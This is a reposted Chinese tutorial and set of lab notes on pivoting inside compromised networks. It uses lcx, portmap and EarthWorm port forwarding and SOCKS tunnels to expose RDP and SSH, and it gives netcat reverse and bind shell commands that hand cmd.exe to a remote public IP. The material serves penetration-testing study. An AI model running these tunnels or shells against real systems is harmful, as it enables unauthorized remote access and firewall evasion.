转载自西梅哥的有道云: https://note.youdao.com/ynoteshare1/index.html?id=a6bf797cce0b6087cb78b44818dca69f&type=note

内网应用

一、端口转发工具:

1.LCX(支持双系统)

A、window(LCX)

上传一些内网主机探测的工具

ms17010(适合08,07)

1.首先安装lcx(正向连接)

在内网主机:转发:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口

在公网地址上:监听:lcx.exe –listen 4444 6666 ##将4444转发出去,转发成6666

验证:远程桌面:mstc 连接公网地址:6666

2.反向连接(lcx --tran)(可以绕过防火墙)

lcx -tran 53 内网地址 3389

自己实验:

正向代理

1.实验环境

首先准备win 08 (内网主机) 192.168.0.101

win 03(web 服务器)192.168.0.103

一台攻击的物理机 192.168.0.102

前提要把lcx这款工具放到内网靶机和web服务器靶机上,放到windows目录下面

验证:

2.做远程桌面连接的端口转发

a、首先在win 08 上面做端口转发,将3389端口转发到公网上面地址的某个端口

lcx -slave web服务器(公网ip) 公网端口 内网地址 内网端口

lcx -slave 192.168.0.103 6666 127.0.0.1 3389

或者

lcx -slave 192.168.0.103 6666 192.168.0.101 3389

b、在web服务器监听到6666端口再转发出去,咱们维劈艾斯服务器或者我们的攻击机器再去用远程桌面连接这个转发出来的端口

lcx –listen 刚才转发过来的端口 转发出去的端口(用户被维劈艾斯或者攻击机的连接端口)

lcx –listen 6666 7777

c、验证:注意,连接的时候,是连接的web服务器的地址(他第一台沦陷的服务器)

反向代理(偏实战)

这一个就很简单了

a、在web服务器上进行反向连接

lcx -tran web服务器的端口(不被防火墙过滤) 内网地址 内网服务端口

lcx -tran 53 192.168.0.101 3389

53是web服务器上的端口,他访问内网的话,不被防火墙拦截

地址是反向代理的内网主机,3389是内网的远程桌面端口

注意:这个53端口是内部开放的,可以绕过防火墙,如果53不行就可以再换一个1000以内的

B、Linux(portmap)

第一种方法:

1.首先将portmap放到kali中

然后进行端口转发

2.

services ssh start

第二种方法:

需要ddns内网穿透工具(花生壳)

自己实验

实验环境:

需要将portmap放到kali里面

./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename] -v: version ##版本号 -h1: host1 ## 一般为被监听的内网地址 -h2: host2 ## 一般是内网的服务端口,列如22,3389等 -p1: port1 ## 一般是你转发给的公网地址 -p2: port2 ## 一般是你转发给的公网端口 -log: log the data ##记录数据到某个日志文件 -m: the action method for this tool ##选择的方法 1: listen on PORT1 and connect to HOST2:PORT2 ##在PORT1上侦听并连接到HOST2:PORT2 相当于lcx -tran 2: listen on PORT1 and PORT2 ##监听,相当于lcx中的 -listen 3: connect to HOST1:PORT1 and HOST2:PORT2 ##转发,相当于lcx -slave  Let me exit...all overd

第一种方法(-m 1):貌似像windows中的反向代理

./portmap -m 1 -p1 转发的公网端口 -h2 内网地址 -p2 内网服务端口

./portmap -m 1 -p1 555 -h2 192.168.0.104 -p2 22

验证

成功

第二种(-m 2,3)先转发,再进行监听,最后再连接web服务器的端口

正向连接:先转发内网ip和端口,再用web服务器监听,再用外边的进行连接

1.首先需要在web服务器开启监听(kali也可以)

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777

./portmap -m 2 -p1 6666 -h2 192.168.0.105 -p2 7777

2.需要在内网主机上进行转发端口(centos7上面安装portmap)

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.0.105 -p2 6666

或者

./portmap -m 3 -h1 192.168.0.104 -p1 22 -h2 192.168.0.105 -p2 6666

验证,发现成功

二、nc

反向连接

首先进行监听:

nc -lvvp 4444

其次在服务器上开启

nc -t -e cmd.exe 公网ip 4444

正向连接(我们攻击去连接被攻击的)

nc -l -p 4444 -t -e cmd.exe

在kali:

nc -vv ip(靶机地址)4444

-vv相当于参数的复用

-v 参数可以将一些关于连接建立信息输出到标准错误。-v参数多出现几次,则显示的信息会更多一些。如果-v参数没有出现,则NetCat将默默地工作,至到出现错误为止。

三、流量转发

就是本来我们访问不到内网的服务,通过流量转发我们就可以直接访问到了

正向代理

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

反向代理

1.在公网服务器上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

2在目标机器执行以下命令

.\ew_for_Win.exe -s rssocks -d 97.xx.xx.23 -e 1024 通过socks隧道连接公网IP的1024端口

1.termite(隧道)EW(内网的穿透)可以顶替lcx

A、端口转发:

2.在windows service03种

将ew放入windows中

反向连接:

正向连接

B、流量转发:

正向代理:

-s ssocksd -l 8888

反向代理:

1.在kali 中

2.win 03

小作业:

自己的实验:

准备环境:

一台kali作为公网转发的web服务器 192.168.0.105

一台win server03为内网服务器(沦陷了)

两个里面都需要安装上ew

如下图:

将这些工具依次导入 准备的环境中:

这些参数我们一会再慢慢解释:

VERSION : free1.2

./xxx ([-options] [values])*

options :

Eg: ./xxx -s ssocksd -h

-s state setup the function.You can pick one from the ##

following options:

ssocksd , rcsocks , rssocks ,

lcx_listen , lcx_tran , lcx_slave

-l listenport open a port for the service startup. ##

-d refhost set the reflection host address. ##

-e refport set the reflection port. ##

-f connhost set the connect host address . ##

-g connport set the connect port. ##

-h help show the help text, By adding the -s parameter, ##

you can also see the more detailed help. ##

-a about show the about pages ##

-v version show the version. ##

-t usectime set the milliseconds for timeout. The default ##

value is 1000 ##

正向代理

在kali中直接去连接

./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理

攻击机通过访问 目标主机8888 端口使用目标主机提供的代理

./ew -s ssocksd -l 8888

我们再在我们物理机的浏览器上设置一个代理

一定要看清楚代理类型:SOCKS5

发现成功

反向代理

这次要准备kali作为web服务器,连接外网的

win server 03作为内网

1.在公网服务器(kali)上执行以下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

./ew -s rcsocks -l 7777 -e 1024

2在目标机器(win 03)执行以下命令

.\ew_for_Win.exe -s rssocks -d 97.xx.xx.23 -e 1024 通过socks隧道连接公网IP的1024端口

ew -s rssocks -d 192.168.0.105 -e 1024

3.从浏览器中设置代理进行检测

注意端口

验证

发现成功获取到内网主机那个流量了

流量映射端口反弹(lcx,ew)相关推荐

  1. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  2. Docker 入门系列(5)- Docker 端口映射(映射所有IP地址、映射到指定地址和指定端口、映射指定地址任意端口、查看映射端口配置)

    端口映射 映射容器内应用的服务端口到本地宿主主机 1. 从外部访问容器应用 在启动容器的时候,如果不指定对应的参数,在容器外部是无法通过网络来访问容器内的网络应用和服务的.当容器中运行一些网络应用,要 ...

  3. docker(iptables)目标地址转换,运行中的容器映射端口

    注意:议映射端口尝试-p 8080:8081 的形式,如若不行再尝试该方法,在宿主机执行下面该防火墙规则指令 # iptables -t nat -A PREROUTING -d 宿主机IP -p t ...

  4. marathon新建应用映射端口限制

    映射端口范围不能使用:1~1024 (除 80 443), 5000~5100, 6000~6999, 10000~20000, 31000~32000 映射端口可能与 Chrome 冲突: 6665 ...

  5. 【docker】使用云服务器运行docker时无法访问宿主机的映射端口

    导语:这几天在学docker,在学到容器映射端口时,总是无法访问到宿主机的对应端口,这就很纳闷了,IP地址和端口号都是对应的,eth0的IP地址加上容器外端口.不过想了一下,唯一区别是我在云服务器上跑 ...

  6. 使用uPnP在路由器上映射端口

    摘要:       使用uPnP方式在TP-Link上映射端口,配合WCF定时发送动态拨号IP实现远程访问与管理. 需求:      A客户使用拨号上网,IP经常变,有套系统刚部署经常要连过去更新程序 ...

  7. docker查看映射端口

    docker查看映射端口: [root@VM_0_2_centos local]# docker port b041040f37d3 3306/tcp -> 0.0.0.0:3305 #命令: ...

  8. 记录docker修改mysql映射端口

    刚学习docker 记录以下修改docker mysql容器映射端口号 一.问题描述 1.在创建mysql容器时指定映射端口号,后期需要修改映射端口 二.操作步骤 1.先停掉docker容器,执行以下 ...

  9. docker更改映射端口(实践篇)

    一.系统环境 操作系统:centos7.7 docker环境:20.10.8 二.docker中使用systemctl 测试环境需要搭建一个php的网页,果断选择了docker部署,需要在docker ...

  10. Docker容器映射端口方法

    Docker容器映射端口分两种情况,如果新建容器,直接在docker run或docker create时添加:如果是运行中的容器,该怎样添加呢? 第一种情况:新建容器时添加 格式:docker ru ...

最新文章

  1. HTTPS网络加密双向验证-使用AFNetworking封装
  2. 原来程序员在某个圈子还是蛮吃香的嘛~
  3. 2012年企业Web应用安全防范与趋势展望
  4. php 自动生成查询密码,PHP自动生成随绝密码
  5. JavaScript中正则表达式学习笔记
  6. Integer 值判断相等
  7. 字节跳动和腾讯不正当竞争案将于深圳开庭 抖音:我们也是看新闻才知道本月24日要开庭...
  8. C# DllImport用法和路径问题
  9. 机器视角:长文揭秘图像处理和卷积神经网络架构
  10. hdu 4300 Clairewd’s message kmp匹配! 多校联合赛第一题
  11. GoogLeNet 之 Inception v1 v2 v3 v4
  12. 2014年个人工作愿景
  13. 达尔优108机械合金版键盘驱动 正式版
  14. 拼图(九宫格,十六宫格)
  15. 快手c类违规影响引流吗?快手C类违规封号还能解封吗?
  16. 2014-07-23 .NET实现微信公众号接入
  17. 博弈论大作战之 PART1
  18. matlab中exp(liangx),Matlab基础知识
  19. STM32实现LED流水灯
  20. 南加大计算机硕士学制,南加州大学研究生学制几年

热门文章

  1. linux服务器发异常包,如何排查Linux服务器上的恶意发包行为
  2. 手工编译Flex SDK 多国语言包
  3. 在virtual box虚拟机上下载sniffer pro
  4. TRIZ创新方法#学习笔记02# |功能分析、技术矛盾和物理矛盾
  5. Inspect(VB.NET、C#版)软件的的下载和使用
  6. Qt开发经验小技巧196-200
  7. 图的深度优先遍历和广度优先遍历算法流程图
  8. mp3分割方法,如何将mp3分割
  9. 百度地图开发-实现离线地图功能 05
  10. 计算机组装与维护思考问题,计算机组装与维护心得体会